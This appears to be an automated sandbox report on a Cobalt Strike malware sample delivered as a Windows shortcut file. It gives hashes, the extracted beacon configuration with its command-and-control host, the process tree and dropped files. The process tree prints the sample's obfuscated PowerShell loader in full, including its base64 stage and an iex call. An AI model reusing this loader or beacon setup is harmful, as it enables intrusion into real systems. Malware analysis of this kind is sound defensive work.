cobaltstrike | 300c090861a547a4c211b15b9f45d6dcb976128c21b78b6c38d1cf4c5d998e12

Analysis

max time kernel
151s
max time network
34s
platform
windows7_x64
resource
win7v20201028
submitted
06-03-2021 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ds7002.lnk
Size

392KB
MD5

6ed0020b0851fb71d5b0076f4ee95f3c
SHA1

e431261c63f94a174a1308defccc674dabbe3609
SHA256

2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
SHA512

2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3

Score

10^/10

cobaltstrike backdoor trojan

Malware Config

Extracted

Family

cobaltstrike

http://pandorasong.com:443/access/

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
pandorasong.com,/access/
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
4352
maxdns
255
month
0
pipe_name
\\%s\pipe\msagent_%x
polling_time
300000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
7.382016e+08
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.350256387e+09
uri
/radio/xmlrpc/v45
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1204 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

1316 powershell.exe
1316 powershell.exe
1316 powershell.exe
1316 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1088 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1316 powershell.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

1088 AcroRd32.exe
1088 AcroRd32.exe
1088 AcroRd32.exe
1088 AcroRd32.exe

pid	process
1204	rundll32.exe

pid	process
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe

pid	process
1088	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	1316	powershell.exe

pid	process
1088	AcroRd32.exe
1088	AcroRd32.exe
1088	AcroRd32.exe
1088	AcroRd32.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exe

description	pid	process	target process
PID 1652 wrote to memory of 1316	1652	cmd.exe	powershell.exe
PID 1652 wrote to memory of 1316	1652	cmd.exe	powershell.exe
PID 1652 wrote to memory of 1316	1652	cmd.exe	powershell.exe
PID 1316 wrote to memory of 1016	1316	powershell.exe	csc.exe
PID 1316 wrote to memory of 1016	1316	powershell.exe	csc.exe
PID 1316 wrote to memory of 1016	1316	powershell.exe	csc.exe
PID 1016 wrote to memory of 968	1016	csc.exe	cvtres.exe
PID 1016 wrote to memory of 968	1016	csc.exe	cvtres.exe
PID 1016 wrote to memory of 968	1016	csc.exe	cvtres.exe
PID 1316 wrote to memory of 1460	1316	powershell.exe	csc.exe
PID 1316 wrote to memory of 1460	1316	powershell.exe	csc.exe
PID 1316 wrote to memory of 1460	1316	powershell.exe	csc.exe
PID 1460 wrote to memory of 1648	1460	csc.exe	cvtres.exe
PID 1460 wrote to memory of 1648	1460	csc.exe	cvtres.exe
PID 1460 wrote to memory of 1648	1460	csc.exe	cvtres.exe
PID 1316 wrote to memory of 1088	1316	powershell.exe	AcroRd32.exe
PID 1316 wrote to memory of 1088	1316	powershell.exe	AcroRd32.exe
PID 1316 wrote to memory of 1088	1316	powershell.exe	AcroRd32.exe
PID 1316 wrote to memory of 1088	1316	powershell.exe	AcroRd32.exe
PID 1316 wrote to memory of 1204	1316	powershell.exe	rundll32.exe
PID 1316 wrote to memory of 1204	1316	powershell.exe	rundll32.exe
PID 1316 wrote to memory of 1204	1316	powershell.exe	rundll32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7935.tmp" "c:\Users\Admin\AppData\Local\Temp\azml0mmg\CSCF41062811AF64EB8B76355785C43DF76.TMP"
4⤵
PID:968

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A3E.tmp" "c:\Users\Admin\AppData\Local\Temp\qnbriipl\CSC38FD58C019844D95A74B93613CFC2C1.TMP"
4⤵
PID:1648

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1088

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
3⤵
- Loads dropped DLL
PID:1204

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7935.tmp
MD5
c50db25a7a496eaf235abb6bd2647a75

SHA1
afc78d473846a3fd0a38d845a0c0b0655d6c9f8c

SHA256
c86b6b71f5bc170cf33dd924331511cbafbbbcc7f366c6a06e5a1cc168e34015

SHA512
fc66ecf2830995f6b4835dae786973e4217a8853fc62a8c508c8b173b32ff22f28aa62f6a06c50f9b7dc8b34986b736ff87ef0b7290faa77866643c526c63d7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7A3E.tmp
MD5
570ae4bb3eaae2736cc22fa97655a180

SHA1
d91d21d2517548175680ce3c0824ed60877f7824

SHA256
9bd1b8356cfb718a4a617d0c16a6da32f16cff69d9ed29f037696c5a77880978

SHA512
3b8efaa057f1bdadfd4aa7e441ec670e44cd40949309887d2332841a33d04dce4d0d46715df3fc70fe4f76d4396f2d21ec8707b2f3e803304b5077a3a09509f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.dll
MD5
81e9b50c1d1680a056d61a268e83cc33

SHA1
557b6442c90a7868e5876c13890360f307257e7e

SHA256
4908fd6eb24fde6ad3aa935498df13261f9d52592e6127e2924ad63a0025f827

SHA512
7587cdc13ca4415a6a8e2e32eb22c06fd91283088d1492d60ff5ba227605616c5bf7ce557c27e75ce044b80a578e756a09885c7aa1e75c922954da55ab69dedb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
MD5
313f4808aa2a2073005d219bc68971cd

SHA1
053fb60530e884851eb8b6aebbec4570ec788d4a

SHA256
b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1

SHA512
1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d

Download Submit
C:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.dll
MD5
90076d7f0cb65a3e35a9490bb4de5a8a

SHA1
c72b79642a11f7f270103e6bb124b0885ea0486f

SHA256
5d7200836431f12ae71b902c46aebbb645593862373325fb166c8d532d7dd672

SHA512
ac66bd60cd9b69806faa6496d24444b54b48d882657fdd5be17deea1415064145fd8fea43383e6b4e0cf6abfc29e7d8c8ca2a4ceed1cd0835c71d0148341e3dd

Download Submit
C:\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\CSCF41062811AF64EB8B76355785C43DF76.TMP
MD5
8189830fb4ed9efde242d87b12f19043

SHA1
69c614e94f2b0d2fe46f72b830f382cff60fdbba

SHA256
2fd61bb673e2d36384f3fa2cfb03da55aae72338c99f35135577df1044a62c69

SHA512
b8b1ea9c04aea15ce3ea677f475681939fbb2855419b94f70c3ae731f1e10b170344afffa79d067907bdd7b9fd84a61f9028d55d92f150065069229b991a5d20

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.0.cs
MD5
cdcb629e6587254315606a6ba3764745

SHA1
d5b706ca48b7af8926926e80565148f725c75393

SHA256
3c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55

SHA512
29f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.cmdline
MD5
5256ad7a509e68c2155d6c261424861f

SHA1
ece23d4fbb60c6cc6151810a9413b71fc7b5e703

SHA256
262cc0aa5de1f301335dce47974f382b57dd68e58c6429616b263146ad8aa8db

SHA512
362bf34b5a25136d7485629aa0e6d0e87b86cc2537bfee59bd813d22cdc4544c074c7167324a9939b9860f736f20dadf3269be59a657cc6c452623a923504ac8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\CSC38FD58C019844D95A74B93613CFC2C1.TMP
MD5
cf77f7556f08d806e5d93d7ee5f6d2a7

SHA1
081e3c401cce2c6306c880cddf906c0213f57f06

SHA256
7c636eca1cc69a2a875d08a95264f4354be2ec9d0eb1b9b08c5de7c9fe4e16f7

SHA512
5030634c3b38c10e6580c2ea19081e64204374095e197505f812fac2b975bee7ce3ffa6e5f084b8f95706f8c9d76107a606c271c37a25d4c9d967cab57fa4ddc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.0.cs
MD5
171a88ab4fad87acfd2e5032eb0c6113

SHA1
754de0e7656c558d335710fc41cbf196d39c1a19

SHA256
5473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6

SHA512
87ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.cmdline
MD5
0207c2684a8b1e3f48788c69acb4db21

SHA1
0e6b6afbf4106b67b67589f2cf0e6c45328d4c70

SHA256
7ebfc5990b019d5dcecbce43c126e56956a5672f07cff2e7cc8eeaa44fd69f7e

SHA512
5b6bc510a7917a566ddb134d74466cd2912758aa18a792e50049862359cb674488c234663c27555c8c182736e705515f5faa17edc66c95cadb0ee556b0a6d6c3

Download Submit
\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
memory/968-17-0x0000000000000000-mapping.dmp

Download
memory/1016-14-0x0000000000000000-mapping.dmp

Download
memory/1088-31-0x0000000075571000-0x0000000075573000-memory.dmp

Filesize
8KB

Download
memory/1088-30-0x0000000000000000-mapping.dmp

Download
memory/1204-38-0x0000000001E00000-0x0000000001E7E000-memory.dmp

Filesize
504KB

Download
memory/1204-37-0x0000000000270000-0x00000000002B0000-memory.dmp

Filesize
256KB

Download
memory/1204-36-0x000000006BAC0000-0x000000006BB0F000-memory.dmp

Filesize
316KB

Download
memory/1204-32-0x0000000000000000-mapping.dmp

Download
memory/1316-7-0x000000001AC40000-0x000000001AC41000-memory.dmp

Filesize
4KB

Download
memory/1316-10-0x000000001ABC4000-0x000000001ABC6000-memory.dmp

Filesize
8KB

Download
memory/1316-9-0x000000001ABC0000-0x000000001ABC2000-memory.dmp

Filesize
8KB

Download
memory/1316-8-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/1316-29-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download
memory/1316-13-0x000000001AB20000-0x000000001AB21000-memory.dmp

Filesize
4KB

Download
memory/1316-21-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/1316-12-0x000000001C120000-0x000000001C121000-memory.dmp

Filesize
4KB

Download
memory/1316-11-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/1316-6-0x00000000023C0000-0x00000000023C1000-memory.dmp

Filesize
4KB

Download
memory/1316-5-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download
memory/1316-3-0x0000000000000000-mapping.dmp

Download
memory/1460-22-0x0000000000000000-mapping.dmp

Download
memory/1648-25-0x0000000000000000-mapping.dmp

Download
memory/1652-2-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

Filesize
8KB

Download